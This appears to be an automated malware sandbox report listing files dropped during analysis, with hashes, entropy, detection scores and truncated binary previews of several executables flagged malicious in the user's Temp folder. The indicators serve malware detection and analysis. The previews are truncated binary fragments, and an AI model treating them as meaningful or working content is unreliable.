                                                                                                                                                                                            Preview: I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERA5A6.tmp.txt
                                                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):13340
                                                                                                                                                                                            Entropy (8bit):2.6958459932531285
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:9GiZYWqmbloY/YSW48H5YYEZDNt6iCqZSnwOLDaOzegIYzDvIoD3:9jZDqYrjO3a8XIYzMoD3
                                                                                                                                                                                            MD5:A48C0C244A03917EB506BFC4589E49E6
                                                                                                                                                                                            SHA1:46D79E4DFCD5E10A83A8D5C0570C8593083697AE
                                                                                                                                                                                            SHA-256:D2AB6DF46DBA2B199382BAE371ED00789E343881376CCFE37614AE36A19E49CC
                                                                                                                                                                                            SHA-512:07743E4D06DC669DFAE13CBC81A15E6777751FD33157BFF2551CCE986D5EE22F953586EB0D773F4ED529CF15EE165B28F08530A2D018025C5013A6F7FE0E3D23
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                            Preview: B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERBF7C.tmp.dmp
                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                            File Type:Mini DuMP crash report, 14 streams, Fri Jan 14 11:29:26 2022, 0x1205a4 type
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):36668
                                                                                                                                                                                            Entropy (8bit):2.119750978682941
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:192:KulxjOs+oPOeh0kEHwyhZwqTm8TqsMRhhQRdZ1I/:vGeO9BEoZC/
                                                                                                                                                                                            MD5:D605C4F70774958E2547E6414FD4A784
                                                                                                                                                                                            SHA1:4EC2D2615AF2F97C7E6D177B1A415166360DD43C
                                                                                                                                                                                            SHA-256:5C38CA968F16D2BC4C57EC90E0B3D4563435E21F1ABB8A4C55D8A6943BAB491D
                                                                                                                                                                                            SHA-512:DE0D5112C7CC04651309A6406040955F27ADA781CB80157935E35E8579FC12AD48B9F7045B7705DB89ED06A4F037A7B83B6965D8D9CFEF9FDF127F8D3DB081A8
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                            Preview: MDMP....... ........^.a........................................z%..........T.......8...........T................z..........H...........4....................................................................U...........B..............GenuineIntelW...........T.......h....^.a.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERC559.tmp.WERInternalMetadata.xml
                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                            File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):8392
                                                                                                                                                                                            Entropy (8bit):3.70325701546705
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:192:Rrl7r3GLNi7g6is06Yr8SUp8gmfyRSvpU+pDV89bqlsfYOm:RrlsNiM6y6YQSUygmfyRSvpyq+f4
                                                                                                                                                                                            MD5:32D09D1ABD420B614246EBA61BA9CFE8
                                                                                                                                                                                            SHA1:C5F78339CE65139BB7DF356B40A8AF1E9366D46F
                                                                                                                                                                                            SHA-256:142D5B3FAC8B1F050783F59D8971529DD62F71CC792194CFE041678238A2AD3D
                                                                                                                                                                                            SHA-512:EB46878449E623A991383FBA000D603EC444E71DFBA0F01BD3A53AEFC529C122C8A234EBEB27AB357C74E692A54118DB7E179ECC651210B83C08AF944989D999
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                            Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.7.6.0.<./.P.i.d.>.......
                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERC913.tmp.xml
                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):4685
                                                                                                                                                                                            Entropy (8bit):4.480601083768932
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:48:cvIwSD8zsnJgtWI9TLWSC8Bg8fm8M4Jt8qFFh+q8vx8ZZ1T/W2d:uITfJo6SN7JLhKQZ1T/W2d
                                                                                                                                                                                            MD5:A1F7CC4965649E691E2187A3A528262D
                                                                                                                                                                                            SHA1:90CDD28B76330D7F49F90456526597690D2E8BF2
                                                                                                                                                                                            SHA-256:F1086A6B524BC2AEBE8AB605F40C7A4EEACF3B94BC3EA1211B955A0B6CCEE28F
                                                                                                                                                                                            SHA-512:89AEB5281D2AAF618C254F27A34C9CED7A50E8617FB1A880DF30CDA538CF5A700D0BB8D4D7B263D9C86282883203AC77A66C7A0F4B3C9528A714A48344B3C33B
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                            Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1341880" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\FA5C.exe.log
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\FA5C.exe
                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):700
                                                                                                                                                                                            Entropy (8bit):5.346524082657112
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12:Q3La/KDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKhat/DLI4M/DLI4M0kvoDLIw:ML9E4Ks2wKDE4KhK3VZ9pKhgLE4qE4jv
                                                                                                                                                                                            MD5:65CF801545098D915A06D8318D296A01
                                                                                                                                                                                            SHA1:456149D5142C75C4CF74D4A11FF400F68315EBD0
                                                                                                                                                                                            SHA-256:32E502D76DBE4F89AEE586A740F8D1CBC112AA4A14D43B9914C785550CCA130F
                                                                                                                                                                                            SHA-512:4D1FF469B62EB5C917053418745CCE4280052BAEF9371CAFA5DA13140A16A7DE949DD1581395FF838A790FFEBF85C6FC969A93CC5FF2EEAB8C6C4A9B4F1D552D
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                            Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..2,"Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Dynamic, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\7D38.exe
                                                                                                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):905216
                                                                                                                                                                                            Entropy (8bit):7.399713113456654
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12288:KoXpNqySLyUDd48BpBIfj2ucA0ZeEbVkw+lMbguodE1z0oLxCZJ9tzj8kpcunn:KoO9FDZpBIMR/4Mzv2Jnp
                                                                                                                                                                                            MD5:852D86F5BC34BF4AF7FA89C60569DF13
                                                                                                                                                                                            SHA1:C961CCD088A7D928613B6DF900814789694BE0AE
                                                                                                                                                                                            SHA-256:2EAA2A4D6C975C73DCBF251EA9343C4E76BDEE4C5DDA8D4C7074078BE4D7FC6F
                                                                                                                                                                                            SHA-512:B66B83D619A242561B2A7A7364428A554BB72CCC64C3AC3F28FC7C73EFE95C7F9F3AC0401116AE6F7B41B960C323CC3B7ADAC782450013129D9DEC49A81DCEC7
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: Metadefender, Detection: 34%
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 77%
                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................g.....q.I....v....h......E....x.....f.....c...Rich..................PE..L....[._................. ...2.......0.......0....@..........................P|......q......................................Xf..(....p.. ............................1..............................@Y..@............0...............................text............ .................. ..`.rdata.."?...0...@...$..............@..@.data...8....p.......d..............@....rsrc... .n..p......................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\8A6B.exe
                                                                                                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):301056
                                                                                                                                                                                            Entropy (8bit):5.192330972647351
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3072:4/ls8LAAkcooHqeUolNx8IA0ZU3D80T840yWrxpzbgqruJnfed:Ils8LA/oHbbLAGOfT8auzbgwuJG
                                                                                                                                                                                            MD5:277680BD3182EB0940BC356FF4712BEF
                                                                                                                                                                                            SHA1:5995AE9D0247036CC6D3EA741E7504C913F1FB76
                                                                                                                                                                                            SHA-256:F9F0AAF36F064CDFC25A12663FFA348EB6D923A153F08C7CA9052DCB184B3570
                                                                                                                                                                                            SHA-512:0B777D45C50EAE00AD050D3B2A78FA60EB78FE837696A6562007ED628719784655BA13EDCBBEE953F7EEFADE49599EE6D3D23E1C585114D7AECDDDA9AD1D0ECB
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2t..v.i.v.i.v.i.hG..i.i.hG....i.hG..[.i.Q...q.i.v.h...i.hG..w.i.hG..w.i.hG..w.i.Richv.i.........PE..L.....b_.............................-.......0....@.......................... ...............................................e..P....................................2.............................. Y..@............0...............................text............................... ..`.rdata..D?...0...@..."..............@..@.data...X....p...$...b..............@....rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\95C6.exe
                                                                                                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):320000
                                                                                                                                                                                            Entropy (8bit):6.68963832251392
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:03Oruhy9+2efARaYhqUc9xm1IQgUS1u2NG03OF:aOrm0JRzp0x/QgUp2N6
                                                                                                                                                                                            MD5:F768F4A81E8B87D6990895A35B8D7D6C
                                                                                                                                                                                            SHA1:D0E5C1E975EC41E222F99F7A235D85317A1BE3A7
                                                                                                                                                                                            SHA-256:164149035D4A3D2EDBA76C0601F6F83E04D45D7C057D221130C57FC9B13FD5B5
                                                                                                                                                                                            SHA-512:004DFFBFCF0F36E6C4A411D3D499F25D8441F98F465D1B8A704CE9E9004D2785604C15F96E33A9761DEFE4AE1454E84BD76DD5CAE1A3658EF14D301FE0B69720
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<..R..R..R......R....g.R..])..R..S...R.....R......R......R.Rich.R.................PE..L......`............................ .............@.................................'.......................................T...(.......................................................................@...............D............................text............................... ..`.data...............................@....zas................................@....give...............................@....riyevol............................@....rsrc...............................@..@.reloc..XF.......H..................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\96DB.exe
                                                                                                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):373760
                                                                                                                                                                                            Entropy (8bit):6.990411328206368
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:GszrgLWpo6b1OmohXrIdF5SpBLE4Hy+74YOAnF3YFUGFHWEZq:Gsgq3b1Omsb7pBLEazsYOSGFHFHW
                                                                                                                                                                                            MD5:8B239554FE346656C8EEF9484CE8092F
                                                                                                                                                                                            SHA1:D6A96BE7A61328D7C25D7585807213DD24E0694C
                                                                                                                                                                                            SHA-256:F96FB1160AAAA0B073EF0CDB061C85C7FAF4EFE018B18BE19D21228C7455E489
                                                                                                                                                                                            SHA-512:CE9945E2AF46CCD94C99C36360E594FF5048FE8E146210CF8BA0D71C34CC3382B0AA252A96646BBFD57A22E7A72E9B917E457B176BCA2B12CC4F662D8430427D
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......l..U(...(...(...6.).1...6.?.W....l..+...(.......6.8.....6.(.)...6.-.)...Rich(...........PE..L...a.R`.....................v......@.............@..................................&..........................................(........{...................0..........................................@...............8............................text............................... ..`.data...............................@....gizi...............................@....bur................................@....wob................................@....rsrc....{.......|..................@..@.reloc..4F...0...H...l..............@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\A15C.exe
                                                                                                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                                                                                                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):356864
                                                                                                                                                                                            Entropy (8bit):7.848593493266229
                                                                                                                                                                                            Encrypted:false
SSDEEP: 6144:v5aWbksiNTBiNg5/dEQECtD2YajndnU4aomwStqUJE0ra7yswH:v5atNTMNg5eQX2BdUcDStq+J4bwH
MD5: 6E7430832C1C24C2BF8BE746F2FE583C
SHA1: 158936951114B6A76D665935AD34F6581556FCDF
SHA-256: 972D533E4DF0786799C0E7C914AA6C04870753C10757C5D58CD874B92A7F4739
SHA-512: 79289323C1104F7483FAC9BF2BCAB5B3804C8F2315C8EDEA9D7C83C8B68B64473122F9B38627169D64A35A960A5F74A3364159CA9CB37B0A2B1BA1B41607A8C8
Malicious: true
Antivirus:
• Joe Sandbox ML, Detection: 100%
Reputation: unknown
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....usZ...............2.....\...............0....@.........................................................................lq......................................................................................pt..<............................code...~8.......:.................. ..`.text...B....P.......>.............. ..`.rdata...3...0...4..................@..@.data........p.......J..............@....rsrc................\..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\B3EB.exe
Process: C:\Windows\explorer.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 3576320
Entropy (8bit): 7.9976863291960605
Encrypted: true
SSDEEP: 49152:Y+RSFqeQKgdJee+ntOkgd+TuRCg+687ZEYNFvKfDIcK8nAONaGGh:Yb8eQKg+tOV0T0z875NFKfDPK8nASA
MD5: 5800952B83AECEFC3AA06CCB5B29A4C2
SHA1: DB51DDBDF8B5B1ABECD6CFAB36514985F357F7A8
SHA-256: B8BED0211974F32DB2C385350FB62954F0B0F335BC592B51144027956524D674
SHA-512: 2A490708A2C5B742CEB14DE6E2180C4CB606FCCEB5F17DE69249CF532EDC37B984686B534A88AE861CC38471C5892785C26DA68C4F662959542458C583E77E38
Malicious: true
Antivirus:
• Joe Sandbox ML, Detection: 100%
Reputation: unknown
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a.................$...................@....@...........................S......!7.....................................|.N. .... M...................................................................................................................... ..........................@................0......................@................@...z..................@............ ...0......................@...........x+...P......................@.............1.........................@....rsrc........ M......L0.............@....28gybOo......N.......1.............@....adata.......pS.......6.............@...........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\BBBC.exe
Process: C:\Windows\explorer.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 905216
Entropy (8bit): 7.399713113456654
Encrypted: false
SSDEEP: 12288:KoXpNqySLyUDd48BpBIfj2ucA0ZeEbVkw+lMbguodE1z0oLxCZJ9tzj8kpcunn:KoO9FDZpBIMR/4Mzv2Jnp
MD5: 852D86F5BC34BF4AF7FA89C60569DF13
SHA1: C961CCD088A7D928613B6DF900814789694BE0AE
SHA-256: 2EAA2A4D6C975C73DCBF251EA9343C4E76BDEE4C5DDA8D4C7074078BE4D7FC6F
SHA-512: B66B83D619A242561B2A7A7364428A554BB72CCC64C3AC3F28FC7C73EFE95C7F9F3AC0401116AE6F7B41B960C323CC3B7ADAC782450013129D9DEC49A81DCEC7
Malicious: true
Antivirus:
• Joe Sandbox ML, Detection: 100%
Reputation: unknown
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................g.....q.I....v....h......E....x.....f.....c...Rich..................PE..L....[._................. ...2.......0.......0....@..........................P|......q......................................Xf..(....p.. ............................1..............................@Y..@............0...............................text............ .................. ..`.rdata.."?...0...@...$..............@..@.data...8....p.......d..............@....rsrc... .n..p......................@..@........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\C487.exe
Process: C:\Windows\explorer.exe
File Type: MS-DOS executable
Category: dropped
Size (bytes): 557664
Entropy (8bit): 7.687250283474463
Encrypted: false
SSDEEP: 12288:fWxcQhhhhhn8bieAtJlllLtrHWnjkQrK8iBHZkshvesxViA9Og+:fWZhhhhhUATlLtrUbK8oZphveoMA9
MD5: 6ADB5470086099B9169109333FADAB86
SHA1: 87EB7A01E9E54E0A308F8D5EDFD3AF6EBA4DC619
SHA-256: B4298F77E454BD5F0BD58913F95CE2D2AF8653F3253E22D944B20758BBC944B4
SHA-512: D050466BE53C33DAAF1E30CD50D7205F50C1ACA7BA13160B565CF79E1466A85F307FE1EC05DD09F59407FCB74E3375E8EE706ACDA6906E52DE6F2DD5FA3EDDCD
Malicious: true
Antivirus:
• Joe Sandbox ML, Detection: 100%
Reputation: unknown
Preview: MZ.....o...g.'.:.(3...32.....f.....C'B{b.........+..R...d:.....Q..............................................................................................................................................................................................PE..L....5...............0..$...*........... ...`....@..........................0.......@....@..................................p..........P)...........................................................................................................idata...`.............................`.pdata.......p......................@....rsrc...P)......0...................@..@.didata..........x..................@.....................................................................................................................................................................................................................................................................................................................g..L.r9..v9.<iP.hL[Kc...",..

C:\Users\user\AppData\Local\Temp\CF17.exe
Process: C:\Windows\explorer.exe
File Type: PE32 executable (console) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 356864
Entropy (8bit): 7.8500958922173165
Encrypted: false
SSDEEP: 6144:P5aWbksiNTBQlCuchwPuVbIn97yYUdL6TVrp/LbU7LY6TzeWJwN:P5atNTqlCl84wJyYUpUrLbU9SWJwN
MD5: FEB8ADD569247306CB0271C907607238
SHA1: BB9353D602A82FF174AFE7574F4AFD6009E2A8B0
SHA-256: E7587776ADECF859E137E7AF3DA4B9B6FD9428E6F89CC48D3A63886D490BAACA
SHA-512: 6F650A1D44A11B2205E59DC915E244AC43988C7AC32972280CC5C5CA1ED668B683C2B06F61AEF8D2E91CE1C83FC4E0788207023B6CA81372ACDB4935F0402689
Malicious: true
Antivirus:
• Joe Sandbox ML, Detection: 100%
Reputation: unknown
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....usZ...............2.....\...............0....@.........................................................................lq......................................................................................pt..<............................code...~8.......:.................. ..`.text...B....P.......>.............. ..`.rdata...3...0...4..................@..@.data........p.......J..............@....rsrc................\..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\CFE8.exe
Process: C:\Windows\explorer.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 323072
Entropy (8bit): 6.715654310492716
Encrypted: false
SSDEEP: 6144:LDKNqNHeJZentJavqabB5guxMOgOC9nfpL6P9KJ:LDRNHWsJdKDgXOgOYfpQU
MD5: E1AF41681888A847863EE17BD63450A0
SHA1: E03508E1D39121DD0263C5A734C1C6ED0E266AC1
SHA-256: AEED1BF32DF36AD3CCC929987DBD30E2B1836C267223614D3648B3027E23E1FE
SHA-512: 1E4F8699884B43B06020469AE6BBE94F3744075595DE9EFAF868DD7AB5FB40DE89CF5CADA3E9EA6033F3316D09EA4B9B79837E6C9AD8742436C07FF1B86E65B1
Malicious: true
Antivirus:
• Joe Sandbox ML, Detection: 100%
Reputation: unknown
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<..R..R..R......R....g.R..])..R..S...R.....R......R......R.Rich.R.................PE..L....V._............................@.............@.........................................................................t...(.......................................................................@...............D............................text............................... ..`.data...............................@....sutala.............................@....buve...............................@....bobe...............................@....rsrc................"..............@..@.reloc..bF.......H..................@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\E2A6.exe
Process: C:\Windows\explorer.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 320000
Entropy (8bit): 6.689874466366023
Encrypted: false
SSDEEP: 6144:rwbDZlpg+MKH0e+F4a3TCkh4hXfcAg4SzqHeBcgKl:rUZfgTKH014UBqhEAg4fHe
MD5: E4B33586BFDB5A9CD45F3038B8F4CCBD
SHA1: D9E825FCAB71C80BA1515BEDB40030840837D1B4
SHA-256: 3BB8EF6EAEC03C54C6C517000575EF943577CA0A71E61FD29257786991306133
SHA-512: 3A648A9F056588502191E531AF5BC19E57B802C5B6DB71DA9F6C9CACD4715726E0058D04C5597329338E930AED6B2A5FFD736C779F36CABCB8CAF6D509AEBE7B
Malicious: true
Antivirus:
• Joe Sandbox ML, Detection: 100%
Reputation: unknown
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<..R..R..R......R....g.R..])..R..S...R.....R......R......R.Rich.R.................PE..L...-..`.........................................@.................................:=..........................................(.......................................................................@...............D............................text...~........................... ..`.data...............................@....tojid..............................@....vese...............................@....fikazap............................@....rsrc...............................@..@.reloc..XF.......H..................@..B........................................................................................................................................................................................................................................................
